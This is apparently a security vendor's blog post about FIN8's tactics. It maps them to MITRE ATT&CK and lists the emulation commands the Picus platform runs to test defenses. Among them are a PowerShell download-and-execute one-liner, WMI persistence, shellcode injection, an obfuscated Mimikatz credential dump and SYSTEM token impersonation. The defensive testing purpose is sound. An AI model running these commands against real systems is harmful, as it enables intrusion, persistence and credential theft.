Sıla Özeren Hacıoğlu | 14 MIN READ

LAST UPDATED ON JULY 04, 2025

FIN8 Enhances Its Campaigns for Advanced Privilege Escalation

FIN8 is a financially motivated advanced persistent threat (APT) group known for its stealth, adaptability, and evolving malware arsenal. Active since 2016, FIN8 initially focused on point-of-sale (POS) breaches but has since grown into a highly capable actor leveraging modular malware, in-memory execution, and ransomware deployment. In recent campaigns, they’ve integrated tools like Sardonic (Ragnar Loader) and Exocet to escalate privileges, evade defenses, and maintain long-term access.

In this blog, we explore FIN8’s latest tactics and techniques, mapped to the MITRE ATT&CK framework, and show how Picus Security simulates these behaviors to help organizations validate and improve their defenses.

FIN8 APT: Overview and Key Findings

A Toolset in Constant Evolution

FIN8’s early campaigns were centered around custom malware like PUNCHTRACK and BADHATCH, designed to infiltrate POS systems in retail and hospitality sectors. But recent years have seen a sharp turn toward modular implants and full-scale ransomware operations.

  • Sardonic (also referred to as Ragnar Loader) has become central to their toolkit. This backdoor supports plugin-based capabilities, making it highly flexible for long-term access, privilege escalation, and payload delivery.

  • In a notable shift, Sardonic has been used to deploy BlackCat/ALPHV and White Rabbit ransomware, marking FIN8’s integration into double-extortion operations.

Stealth is the Strategy

FIN8 excels at blending into target environments. They routinely use PowerShell, WMI, and built-in Windows tools for discovery and persistence. Rather than drop obvious payloads, they:

  • Inject encrypted shellcode into trusted processes,
  • Create WMI event subscriptions for stealthy persistence,
  • Enumerate domains and trust relationships using tools like nltest.

Their tactics are subtle, fileless, and highly evasive, ideal for operating under the radar of signature-based security tools.

From Recon to Ransom

The group’s attack flow often begins with reconnaissance, transitions into credential harvesting, and ends with ransomware deployment. In recent incidents, FIN8 used Sardonic to maintain access, then launched BlackCat payloads to encrypt data and extort victims, mirroring the tactics of top-tier ransomware groups.

  • Ragnar Loader, observed in campaigns attributed to FIN8, FIN7, and others, has played a key role in persistent access and encrypted backdoor communication.

  • Execution is often triggered through system events (e.g., logon), leveraging WMI and PowerShell to evade traditional logging.

Adaptability as a Signature

What sets FIN8 apart is their strategic patience. They’re known to pause campaigns, refine tooling, and return with improved evasion techniques. Sardonic, for instance, was rewritten from C++ to C to better avoid detection.

Each new wave of activity is more refined, more modular, and better equipped to bypass modern defenses.

Aspect

Details

Timeline

Active since 2016; still evolving in 2025

Targeted Industries

Retail, hospitality, finance, insurance, chemicals, tech

Key Toolset

PUNCHTRACK, BADHATCH, Sardonic (Ragnar Loader), Cobalt Strike loaders

Ransomware Used

BlackCat/ALPHV, White Rabbit, Ragnar Locker

Evasion Techniques

Living-off-the-land, in-memory execution, obfuscation, event-driven persistence

Reconnaissance Tools

nltest, PowerShell, WMI-based methods

Notable Behavior

Code rewrites to avoid detection; use of plugin-based modular malware; double-extortion extortion model

FIN8 isn’t just evolving, they’re leading a shift from classic intrusion to stealthy, modular ransomware operations. Their use of native tools, encrypted payloads, and dynamic backdoors like Sardonic makes them a significant threat to enterprises worldwide.

Organizations should treat FIN8 as a long-term adversary, not just a cybercrime group, but an APT-class operation specializing in living-off-the-land and persistence-first tradecraft.

Execute (ATT&CK TA0002)

Command and Scripting Interpreter: PowerShell (MITRE T1059.001)

IN8 routinely abuses PowerShell to execute malicious code in memory without touching disk, one of the most common and effective fileless attack methods used by advanced threat actors.

In a typical scenario, FIN8 initiates PowerShell with execution policy bypassed and profiles disabled. Instead of using static payloads or dropping executables, they craft lightweight stagers that initiate outbound HTTP/S connections using Net.WebClient or Invoke-WebRequest. The response typically contains obfuscated PowerShell code or shellcode loaders, which are then invoked directly using Invoke-Expression (IEX) or similar reflection-based techniques.

This process enables the attacker to:

  • Avoid writing payloads to disk (evading AV/EDR signature-based detection),
  • Chain multiple stages (e.g., stager → loader → final payload) entirely in memory,
  • Maintain operational flexibility by changing remote code without altering initial command structure.

This technique is particularly dangerous because it leverages trusted scripting engines and built-in .NET classes to perform malicious actions under the guise of legitimate administration activity.

How Does Picus Help?

Picus emulates FIN8’s PowerShell-based execution tactics to validate whether your controls can detect or block memory-only payloads:

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('%remotefile-9776%')"

This PowerShell command is a fileless execution technique often used by threat actors like FIN8. This command fetches a remote payload and executes it without writing anything to disk, helping attackers stay stealthy and evade detection.

Windows Management Instrumentation (MITRE T1047)

FIN8 leverages Windows Management Instrumentation (WMI) as a stealthy, indirect method of executing commands on both local and remote systems. Unlike typical process execution through cmd.exe or PowerShell, which are more commonly monitored and flagged, WMI provides a flexible interface that can execute code while blending in with legitimate system administration activity.

A common pattern observed in FIN8 campaigns involves:

  • Dropping or generating a temporary batch script (e.g., .bat file) on the victim host,
  • Using wmic.exe process call create to execute the script asynchronously, without spawning a visible command shell.

This tactic provides several advantages:

  • Reduces visibility to endpoint detection tools focused on cmd.exe or PowerShell-based execution.
  • Supports lateral movement and remote command execution through WMI’s DCOM interface.
  • Enables scheduled, event-based, or policy-driven execution as part of broader persistence mechanisms.

By offloading execution to WMI, FIN8 avoids creating noisy parent-child relationships and leaves minimal forensic artifacts, making detection significantly more challenging.

How Does Picus Help?

Picus simulates FIN8’s use of WMI to validate whether your security controls can detect this type of indirect, stealthy execution. During the simulation, Picus:

  • Creates a temporary .bat file
  • Executes it using WMI via the following command:

wmic.exe process call create "%TMP%\wnvr.bat"

  • Follows it with a command-line process to simulate post-execution behavior:

cmd.exe /c tasklist /svc | findstr /i winver.exe

This test helps determine whether your EDR, XDR, IDS or SIEM solutions are capable of detecting process creation events initiated through WMI, especially those that bypass typical parent-child process relationships.

By mimicking real-world WMI abuse, Picus enables security teams to uncover blind spots in endpoint visibility and strengthen defenses against the kinds of low-noise, high-impact execution tactics used by FIN8.

Discovery (ATT&CK TA0007)

FIN8 uses native Windows tools to silently map out the network and identify key infrastructure components. One of their preferred utilities for domain reconnaissance is nltest.exe, a legitimate command-line tool used by administrators.

Domain Trust Discovery (MITRE T1482)

FIN8 uses built-in Windows tools to map domain infrastructure without raising alarms. By identifying domain controllers and trusted domains, they gain insight into how networks are connected, critical for planning lateral movement or privilege escalation.

Tools like nltest.exe help them:

  • List domain controllers in the current or target domain
  • Discover trust relationships between domains, especially in large, multi-domain environments

Because these commands use native Windows functionality, they often go undetected in enterprise environments.

How Does Picus Help?

Picus simulates FIN8’s domain reconnaissance activity using the same native commands, helping you validate whether your security tools detect or log this kind of stealthy discovery.

Domain Controller Enumeration: Picus runs the following command to mimic how attackers identify domain controllers in the environment.

nltest.exe /dclist:

This helps assess whether your EDR, SIEM, or other controls can detect domain infrastructure discovery attempts.

Enumerates Trusted Domains: Picus runs the following command to replicate how attackers identify domain trust relationships for lateral movement:

nltest /domain_trusts

This allows you to assess your visibility into cross-domain reconnaissance and adjust detections accordingly.

By replicating these common adversary behaviors, Picus ensures your defenses are tested against the exact techniques used in real-world attacks.

Persistence (ATT&CK TA0003)

Event Triggered Execution: Windows Management Instrumentation Event Subscription (MITRE T1546.003)

FIN8 uses Windows Management Instrumentation (WMI) event subscriptions to achieve stealthy persistence on compromised systems. This technique involves deploying a PowerShell script that registers a malicious event filter, consumer, and binding, allowing the attacker to automatically execute payloads in response to specific system events, such as user logon.

Because WMI subscriptions operate in the background and don’t rely on traditional startup methods (like registry keys or scheduled tasks), they are harder to detect and often go unnoticed by standard endpoint monitoring.

How Does Picus Help?

Picus simulates the creation and cleanup of malicious WMI event subscriptions to validate whether your controls can detect and respond to this type of stealthy persistence.

Creates a Malicious WMI Subscription: Picus runs a PowerShell script that simulates how FIN8 uses WMI to gain persistence:

>> Play Process
powershell.exe -c Unblock-File "%TMP%\T1084.ps1"; & "%TMP%\T1084.ps1"

The script creates a WMI event subscription, which means it tells the system:

When a specific event happens (like a user logging in), run this hidden backdoor code.

This lets attackers maintain long-term access without using obvious methods like startup folders or scheduled tasks.

Removes the WMI Subscription (Cleanup): To ensure safe simulation and avoid system impact, Picus then reverses the action:

<< Rewind Process
powershell.exe Get-WmiObject -Namespace "root/subscription" -Class __EventFilter | where name -eq 'Backdoor Logon Filter' | Remove-WmiObject
{predefined-file-delete} %TMP%\T1084.ps1

By simulating both deployment and removal of WMI-based persistence, Picus allows organizations to test visibility, validate alerts, and ensure that such stealthy persistence techniques are being properly monitored and mitigated.

Defense Evasion (ATT&CK TA0005)

FIN8 uses a variety of techniques to evade detection by endpoint security tools. These often involve executing shellcode directly in memory, abusing trusted processes, or obfuscating known attack tools like Mimikatz. 

Each method is designed to bypass behavioral or signature-based detection by blending in or hiding execution.

Process Injection: Thread Execution Hijacking (ATT&CK T1055.003)

FIN8 uses in-memory injection techniques to execute malicious code without writing payloads to disk. One common method involves injecting shellcode into legitimate processes, such as mspaint.exe, using Windows API calls like RtlCreateUserThread

This approach allows the malware to run under the context of a trusted application, making it harder for endpoint defenses to detect or block the activity. By doing so, FIN8 avoids triggering static signatures and blends malicious execution into normal system behavior.

How Does Picus Help?

Picus emulates this behavior by launching a trusted process (e.g., mspaint.exe) and then using the GoPurple framework to inject shellcode into it:

>> Play Process
mspaint.exe
powershell.exe -c "%TMP%\GoPurple.exe -u %remotefile-1816% -t 7 -p (Get-Process mspaint).id;"
{predefined-process-list} notepad.exe

<< Rewind Process
{predefined-process-kill} mspaint.exe
{predefined-process-kill} notepad.exe
{predefined-file-delete} %TMP%\GoPurple.exe

This simulation helps assess whether your defenses can detect memory injection, API abuse, and abnormal behavior inside commonly used Windows processes. Picus also lists spawned processes (e.g., notepad.exe) to simulate post-injection activity and completes the scenario with cleanup actions to restore system state.

Process Injection: Process Hollowing (MITRE T1055.012)

FIN8 often relies on encrypted payloads to evade detection by endpoint defenses. Instead of delivering raw shellcode, they embed it within executables that decrypt and execute the code only at runtime. 

Tools like Exocet are used to wrap shellcode in a benign-looking process, decrypt it in memory, and then trigger execution, without leaving clear indicators on disk. This technique reduces the likelihood of detection by static analysis and signature-based tools.

How Does Picus Help?

Picus replicates this tactic by executing an Exocet-wrapped binary that mimics FIN8’s behavior:

>> Play Process
%TMP%\ExocetedNotepad.exe
{predefined-process-list} notepad.exe

<< Rewind Process
{predefined-file-delete} %TMP%\ExocetedNotepad.exe
{predefined-process-kill} notepad.exe

The binary launches a benign process (e.g., notepad.exe) and injects shellcode at runtime. This allows organizations to test whether their defenses can detect encrypted, in-memory execution and recognize suspicious behavior hidden inside trusted processes. Picus then lists spawned processes to simulate post-execution activity and performs cleanup to safely revert the environment.

Process Injection: Asynchronous Procedure Call (APC) Injection (MITRE T1055.004)

FIN8 employs advanced process injection techniques like Early Bird APC Queue to bypass security controls. This method involves injecting shellcode into a newly created process, such as runonce.exe, before it begins execution. By queuing malicious code in the process’s Asynchronous Procedure Call (APC) queue while the process is still in a suspended state, attackers ensure their payload runs first as soon as the process starts. This evasion tactic helps avoid detection by endpoint monitoring tools that typically inspect running or already-started processes.

This technique is stealthy, fileless, and well-suited for launching payloads without triggering standard behavioral or signature-based alerts.

How Does Picus Help?

Picus emulates this defense evasion technique by running a simulation binary that injects shellcode into a suspended instance of runonce.exe:

>> Play Process
%TMP%\runonceInjection.exe
<< Rewind Process
{predefined-process-list} winver.exe
{predefined-file-delete} %TMP%\runonceInjection.exe

This tests whether your security controls can detect pre-execution injection, APC manipulation, and abnormal memory activity in trusted processes. Picus then lists an additional process (e.g., winver.exe) to simulate subsequent activity and cleans up by deleting the injection binary. This safe emulation allows organizations to validate their ability to detect stealthy in-memory threats used by adversaries like FIN8.

Credential Access (ATT&CK TA0006)

Executing Obfuscated Mimikatz via Powershell-Obfuscation Tool

  • T1059.001 – Command and Scripting Interpreter: PowerShell

    • The attack is executed via PowerShell, which serves as the primary method for running the obfuscated script in memory.

  • T1003.001 – OS Credential Dumping: LSASS Memory

    • Despite obfuscation, the payload’s intent is to extract credentials from LSASS, a core capability of Mimikatz.

FIN8 and similar threat actors often use obfuscated versions of well-known tools like Mimikatz to evade detection while stealing credentials. Instead of running Mimikatz in its raw form, they heavily obfuscate the code using tools like PowerShell-Obfuscation frameworks. These modifications disguise recognizable strings, functions, and behavior, allowing the tool to bypass static signatures and some behavioral rules.

The obfuscated script is typically executed in memory using PowerShell, further avoiding disk-based detection. This combination of in-memory execution and code obfuscation makes detection difficult for traditional endpoint security solutions.

How Does Picus Help?

Picus runs an obfuscated version of Mimikatz using PowerShell to validate whether your defenses can detect credential access activity when common tools are hidden with obfuscation:

>> Play Process
powershell.exe -c "Unblock-File '%TMP%\Invoke-Obfuzkatz.ps1'; Import-Module '%TMP%\Invoke-Obfuzkatz.ps1'; Invoke-Obfuzkatz -Command 'coffee'"
<< Rewind Process
{predefined-file-delete} %TMP%\Invoke-Obfuzkatz.ps1

This simulation assesses your ability to detect obfuscated PowerShell modules, script-based credential theft, and memory-resident tools. After execution, Picus deletes the script to complete the test safely and avoid leaving artifacts.

Privilege Escalation (ATT&CK TA0004)

Access Token Manipulation: Create Process with Token (T1134.002)

To expand access and execute high-privilege actions, FIN8 leverages token manipulation techniques that allow them to impersonate more privileged users, most notably, SYSTEM. Instead of relying on exploits, they often use tools that abuse Windows security tokens to elevate privileges silently.

One such method involves duplicating or impersonating access tokens of already-privileged processes. This allows attackers to spawn new processes under elevated contexts without triggering User Account Control (UAC) or writing exploit code. It’s a fast, stealthy, and reliable path to SYSTEM-level access, especially on misconfigured systems.

How Does Picus Help?

Picus simulates this behavior using SharpToken, a tool designed to demonstrate token manipulation:

>> Play Process
%TMP%\SharpToken.exe execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass

This safely mimics how FIN8-type actors escalate privileges by launching a command under a SYSTEM token. Picus then cleans up the test artifact:

cmd.exe /c del "%TMP%\SharpToken.exe"

By replicating this behavior, Picus helps validate whether your security controls can detect or prevent token-based privilege escalation, before a real attacker does.

How Picus Helps Defend Against FIN8 APT Group's Attacks?

The Picus Security Validation Platform helps by safely simulating FIN8 APT group’s techniques, such as fileless code execution, in-memory injection, WMI-based persistence, and domain reconnaissance, using its continuously updated Threat Library. These simulations uncover blind spots across EDRs, IDRs, XDRs, and SIEMs before attackers can exploit them.

The Picus Threat Library includes the FIN8 APT threat, emulating and simulating real-world tactics, techniques, and procedures (TTPs) to support continuous security control validation, helping organizations measure readiness, reduce exposure, and strengthen defenses against sophisticated threats.

Threat ID

Threat Name

Attack Module

42966

FIN8 Threat Group Campaign

Windows Endpoint

81224

FIN8 Threat Group Campaign Malware Download Threat

Network Infiltration

26028

FIN8 Threat Group Campaign Malware Download Threat

Email Infiltration

38737

Sardonic Loader Download Threat

Network Infiltration

80786

Sardonic Loader EmailThreat

Email Infiltration

 

Table of Contents